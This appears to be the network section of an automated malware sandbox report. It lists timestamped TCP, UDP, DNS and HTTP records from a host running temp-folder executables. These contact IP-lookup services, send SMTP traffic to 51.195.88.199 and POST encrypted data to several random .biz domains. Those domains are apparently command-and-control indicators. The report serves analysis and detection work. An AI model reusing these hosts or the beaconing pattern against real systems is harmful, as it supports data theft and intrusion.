Nov 28, 2024 18:30:22.302871943 CET	587	49989	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:22.302891016 CET	587	49989	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:22.722023010 CET	587	49989	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:22.900934935 CET	49989	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:30:33.917011023 CET	49989	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:30:34.037519932 CET	587	49989	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:34.326739073 CET	587	49989	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:34.327343941 CET	49989	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:30:34.328260899 CET	49990	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:30:34.449493885 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:34.449806929 CET	49990	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:30:35.806843042 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:35.816112995 CET	49990	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:30:35.943006039 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:36.242697001 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:36.243056059 CET	49990	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:30:36.612401962 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:36.612539053 CET	49990	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:30:36.667963982 CET	49990	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:30:36.996812105 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:36.996876955 CET	49990	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:30:37.089616060 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:37.120249033 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:37.385895967 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:37.386315107 CET	49990	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:30:37.506676912 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:37.815130949 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:37.815154076 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:37.815160990 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:37.815346956 CET	49990	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:30:37.816809893 CET	49990	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:30:37.942666054 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:38.242115974 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:38.243954897 CET	49990	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:30:38.364905119 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:38.662714005 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:38.663254023 CET	49990	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:30:38.783780098 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:39.092657089 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:39.093538046 CET	49990	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:30:39.214267015 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:39.514997005 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:39.516205072 CET	49990	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:30:39.641927004 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:39.939840078 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:39.940675974 CET	49990	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:30:40.060842991 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:40.362754107 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:40.362967014 CET	49990	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:30:40.483431101 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:40.786154032 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:40.786468029 CET	49990	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:30:40.786581993 CET	49990	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:30:40.786628962 CET	49990	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:30:40.786714077 CET	49990	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:30:40.790517092 CET	49990	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:30:40.907545090 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:40.907588959 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:40.907598972 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:40.907622099 CET	49990	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:30:40.907744884 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:40.907784939 CET	49990	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:30:40.911741972 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:40.911751986 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:40.911839008 CET	49990	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:30:40.911866903 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:40.911923885 CET	49990	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:30:41.029863119 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:41.029880047 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:41.029889107 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:41.029969931 CET	49990	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:30:41.034754992 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:41.034765959 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:41.034838915 CET	49990	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:30:41.034878016 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:41.034890890 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:41.034943104 CET	49990	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:30:41.150346994 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:41.150373936 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:41.150471926 CET	49990	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:30:41.154476881 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:41.154548883 CET	49990	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:30:41.154635906 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:41.154690027 CET	49990	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:30:41.196341038 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:41.196450949 CET	49990	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:30:41.275360107 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:41.275439024 CET	49990	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:30:41.279719114 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:41.279773951 CET	49990	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:30:41.279784918 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:41.279833078 CET	49990	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:30:41.279998064 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:41.280051947 CET	49990	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:30:41.320337057 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:41.320449114 CET	49990	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:30:41.402108908 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:41.402200937 CET	49990	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:30:41.406438112 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:41.406532049 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:41.406537056 CET	49990	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:30:41.406605005 CET	49990	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:30:41.406733036 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:41.406824112 CET	49990	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:30:41.528904915 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:41.528970957 CET	49990	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:30:41.533046007 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:41.533210993 CET	49990	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:30:41.533276081 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:41.650015116 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:41.653533936 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:41.653630972 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:41.653724909 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:41.653764009 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:41.653855085 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:41.769998074 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:41.770014048 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:41.773529053 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:41.773554087 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:41.773613930 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:41.773653030 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:41.773713112 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:41.773722887 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:41.773844957 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:41.773868084 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:41.773962975 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:41.890041113 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:41.890064001 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:41.893578053 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:41.893589020 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:41.893605947 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:41.893614054 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:41.893660069 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:41.893781900 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:41.893857002 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:41.893965960 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:41.893975973 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:42.009855986 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:42.009879112 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:42.013365984 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:42.013376951 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:42.013705969 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:42.013716936 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:42.013725996 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:42.326184034 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:42.432276964 CET	49990	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:30:54.843980074 CET	49990	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:30:54.969850063 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:55.268047094 CET	587	49990	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:55.268438101 CET	49990	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:30:55.268726110 CET	49991	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:30:55.390222073 CET	587	49991	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:55.390384912 CET	49991	587	192.168.2.7	51.195.88.199
Nov 28, 2024 18:30:56.699347019 CET	587	49991	51.195.88.199	192.168.2.7
Nov 28, 2024 18:30:56.760524988 CET	49991	587	192.168.2.7	51.195.88.199

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 28, 2024 18:26:50.330897093 CET	51574	53	192.168.2.7	1.1.1.1
Nov 28, 2024 18:26:50.729108095 CET	51028	53	192.168.2.7	1.1.1.1
Nov 28, 2024 18:26:50.870781898 CET	53	51028	1.1.1.1	192.168.2.7
Nov 28, 2024 18:26:50.888780117 CET	53	51574	1.1.1.1	192.168.2.7
Nov 28, 2024 18:26:51.095654964 CET	51504	53	192.168.2.7	1.1.1.1
Nov 28, 2024 18:26:51.234446049 CET	53	51504	1.1.1.1	192.168.2.7
Nov 28, 2024 18:26:53.660646915 CET	56347	53	192.168.2.7	1.1.1.1
Nov 28, 2024 18:26:53.803590059 CET	53	56347	1.1.1.1	192.168.2.7
Nov 28, 2024 18:26:54.081670046 CET	58248	53	192.168.2.7	1.1.1.1
Nov 28, 2024 18:26:54.331039906 CET	53	58248	1.1.1.1	192.168.2.7
Nov 28, 2024 18:27:08.880409956 CET	61525	53	192.168.2.7	1.1.1.1
Nov 28, 2024 18:27:09.018801928 CET	53	61525	1.1.1.1	192.168.2.7
Nov 28, 2024 18:27:11.089394093 CET	49547	53	192.168.2.7	1.1.1.1
Nov 28, 2024 18:27:11.711520910 CET	53	49547	1.1.1.1	192.168.2.7
Nov 28, 2024 18:27:15.500617981 CET	51805	53	192.168.2.7	1.1.1.1
Nov 28, 2024 18:27:16.111666918 CET	53	51805	1.1.1.1	192.168.2.7
Nov 28, 2024 18:27:18.229836941 CET	58594	53	192.168.2.7	1.1.1.1
Nov 28, 2024 18:27:18.942018032 CET	53	58594	1.1.1.1	192.168.2.7
Nov 28, 2024 18:27:36.667602062 CET	54496	53	192.168.2.7	1.1.1.1
Nov 28, 2024 18:27:36.809187889 CET	53	54496	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 28, 2024 18:26:50.330897093 CET	192.168.2.7	1.1.1.1	0x2839	Standard query (0)	pywolwnvd.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 18:26:50.729108095 CET	192.168.2.7	1.1.1.1	0x646a	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Nov 28, 2024 18:26:51.095654964 CET	192.168.2.7	1.1.1.1	0xc0a4	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Nov 28, 2024 18:26:53.660646915 CET	192.168.2.7	1.1.1.1	0x2e4b	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Nov 28, 2024 18:26:54.081670046 CET	192.168.2.7	1.1.1.1	0x6add	Standard query (0)	s82.gocheapweb.com	A (IP address)	IN (0x0001)	false
Nov 28, 2024 18:27:08.880409956 CET	192.168.2.7	1.1.1.1	0x6708	Standard query (0)	pywolwnvd.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 18:27:11.089394093 CET	192.168.2.7	1.1.1.1	0x9275	Standard query (0)	ssbzmoy.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 18:27:15.500617981 CET	192.168.2.7	1.1.1.1	0x7586	Standard query (0)	cvgrf.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 18:27:18.229836941 CET	192.168.2.7	1.1.1.1	0x6df1	Standard query (0)	npukfztj.biz	A (IP address)	IN (0x0001)	false
Nov 28, 2024 18:27:36.667602062 CET	192.168.2.7	1.1.1.1	0x1d4	Standard query (0)	npukfztj.biz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 28, 2024 18:26:50.870781898 CET	1.1.1.1	192.168.2.7	0x646a	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 28, 2024 18:26:50.870781898 CET	1.1.1.1	192.168.2.7	0x646a	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Nov 28, 2024 18:26:50.870781898 CET	1.1.1.1	192.168.2.7	0x646a	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Nov 28, 2024 18:26:50.870781898 CET	1.1.1.1	192.168.2.7	0x646a	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Nov 28, 2024 18:26:50.870781898 CET	1.1.1.1	192.168.2.7	0x646a	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Nov 28, 2024 18:26:50.870781898 CET	1.1.1.1	192.168.2.7	0x646a	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Nov 28, 2024 18:26:50.888780117 CET	1.1.1.1	192.168.2.7	0x2839	No error (0)	pywolwnvd.biz		54.244.188.177	A (IP address)	IN (0x0001)	false
Nov 28, 2024 18:26:51.234446049 CET	1.1.1.1	192.168.2.7	0xc0a4	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Nov 28, 2024 18:26:51.234446049 CET	1.1.1.1	192.168.2.7	0xc0a4	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Nov 28, 2024 18:26:51.234446049 CET	1.1.1.1	192.168.2.7	0xc0a4	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Nov 28, 2024 18:26:53.803590059 CET	1.1.1.1	192.168.2.7	0x2e4b	No error (0)	reallyfreegeoip.org		172.67.177.134	A (IP address)	IN (0x0001)	false
Nov 28, 2024 18:26:53.803590059 CET	1.1.1.1	192.168.2.7	0x2e4b	No error (0)	reallyfreegeoip.org		104.21.67.152	A (IP address)	IN (0x0001)	false
Nov 28, 2024 18:26:54.331039906 CET	1.1.1.1	192.168.2.7	0x6add	No error (0)	s82.gocheapweb.com		51.195.88.199	A (IP address)	IN (0x0001)	false
Nov 28, 2024 18:27:09.018801928 CET	1.1.1.1	192.168.2.7	0x6708	No error (0)	pywolwnvd.biz		54.244.188.177	A (IP address)	IN (0x0001)	false
Nov 28, 2024 18:27:11.711520910 CET	1.1.1.1	192.168.2.7	0x9275	No error (0)	ssbzmoy.biz		18.141.10.107	A (IP address)	IN (0x0001)	false
Nov 28, 2024 18:27:16.111666918 CET	1.1.1.1	192.168.2.7	0x7586	No error (0)	cvgrf.biz		54.244.188.177	A (IP address)	IN (0x0001)	false
Nov 28, 2024 18:27:18.942018032 CET	1.1.1.1	192.168.2.7	0x6df1	No error (0)	npukfztj.biz		44.221.84.105	A (IP address)	IN (0x0001)	false
Nov 28, 2024 18:27:36.809187889 CET	1.1.1.1	192.168.2.7	0x1d4	No error (0)	npukfztj.biz		44.221.84.105	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ipify.org

reallyfreegeoip.org

checkip.dyndns.org

pywolwnvd.biz

ssbzmoy.biz

cvgrf.biz

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49701	132.226.8.169	80	6012	C:\Users\user\AppData\Local\Temp\server02.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 18:26:51.005358934 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 28, 2024 18:26:52.891927958 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 28 Nov 2024 17:26:52 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>
Nov 28, 2024 18:26:52.964982986 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 28, 2024 18:26:53.482584953 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 28 Nov 2024 17:26:53 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.228</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49738	54.244.188.177	80	7848	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 18:27:09.634145021 CET	356	OUT	POST /vnpplpufavm HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: pywolwnvd.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 784
Nov 28, 2024 18:27:09.634183884 CET	784	OUT	Data Raw: 79 48 0a a4 e6 e4 ce d1 04 03 00 00 6a 2a f9 4e e9 fc 38 f4 c9 bc 04 9d 69 a5 94 d5 f5 62 23 35 06 17 a8 7d 3c 3d a7 c0 95 19 1a 5d d3 73 be 44 84 bc 22 f9 4f 2d b1 17 5e 8d d8 29 57 ef b5 ef 84 e2 df e1 ef 96 08 22 b8 12 08 de f9 34 86 af 55 35 Data Ascii: yHj*N8ib#5}<=]sD"O-^)W"4U5ez#//J$Azb\Vm})WB&$LRV;hMW0K(Br2" ~zOZyrX-#gk%PNSQ?g&Z\|JT1^!6.
Nov 28, 2024 18:27:11.072211981 CET	413	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Nov 2024 17:27:10 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=470ca829fb397d044e3de3a5717431fc\|8.46.123.228\|1732814830\|1732814830\|0\|1\|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49745	18.141.10.107	80	7848	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 18:27:13.360536098 CET	350	OUT	POST /kokmvod HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ssbzmoy.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 784
Nov 28, 2024 18:27:13.360536098 CET	784	OUT	Data Raw: ce 06 5a d6 a9 4f 33 75 04 03 00 00 ca 4a 3c a9 b9 d5 16 d9 7e 81 78 98 18 b2 a5 1b c6 a1 b4 5d 6a ef ef a7 36 71 08 87 56 73 c5 1f 2c 4e 26 60 af 21 09 7d 39 31 00 41 cf 28 55 7d 33 c3 c9 7b 69 02 e0 f8 bc 9f 73 ce 92 60 40 75 9e 64 2b 9b 0e 60 Data Ascii: ZO3uJ<~x]j6qVs,N&`!}91A(U}3{is`@ud+`KSc'-U:(ncl7a/u]j:\PT~x./\#=2v>#,^FRx=Q;V;\|z1e]*'CrTm2:-]+
Nov 28, 2024 18:27:15.435822964 CET	411	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Nov 2024 17:27:15 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=98e3ef565d7816f4b9e455329bbd1428\|8.46.123.228\|1732814835\|1732814835\|0\|1\|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49753	54.244.188.177	80	7848	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 18:27:16.823854923 CET	354	OUT	POST /yqmdwhskkjhif HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: cvgrf.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 784
Nov 28, 2024 18:27:16.823905945 CET	784	OUT	Data Raw: ee fd 27 13 c2 4e 10 0c 04 03 00 00 dc 16 74 b1 de b4 14 5f eb 58 1b b6 bf e0 c0 52 2a 87 46 cc 7b ba 52 00 57 17 11 1c 2d 10 bf 64 ff 99 a2 f2 91 49 92 60 2e cf 59 7c cf bc 7d 41 c3 54 4c d8 ae c9 ba ff 08 5d aa 6c 38 22 9f 5d 27 62 ac 71 81 92 Data Ascii: 'Nt_XRF{RW-dI`.Y\|}ATL]l8"]'bql$]j/i0ugC[Q8utwXrg;426b<+T5KE9Jp9umA?\|JfFfKmUete 8P%A7Cx;fF"-w{^?R2P
Nov 28, 2024 18:27:18.221394062 CET	409	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Nov 2024 17:27:17 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=b0d38fdfc94de4c105f55c6e484af426\|8.46.123.228\|1732814837\|1732814837\|0\|1\|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49702	172.67.74.152	443	520	C:\Users\user\AppData\Local\Temp\neworigin.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-28 17:26:52 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-11-28 17:26:53 UTC	424	IN	HTTP/1.1 200 OK Date: Thu, 28 Nov 2024 17:26:52 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 8e9c10c52ca12365-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1796&min_rtt=1791&rtt_var=682&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1593886&cwnd=154&unsent_bytes=0&cid=31eeccea1930ddc0&ts=606&x=0"
